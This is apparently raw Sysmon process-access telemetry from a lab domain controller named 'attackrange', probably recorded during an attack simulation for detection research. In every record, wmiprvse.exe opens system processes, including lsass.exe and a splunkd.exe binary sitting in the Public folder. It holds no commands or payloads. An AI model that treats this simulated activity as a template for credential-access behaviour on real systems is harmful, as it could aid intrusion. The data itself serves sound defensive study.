15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023521Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023520Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023519Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023518Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023517Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023516Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023515Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023514Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023513Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023512Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023511Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023510Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023509Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023508Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023507Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023506Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023505Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023504Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023503Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023908Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 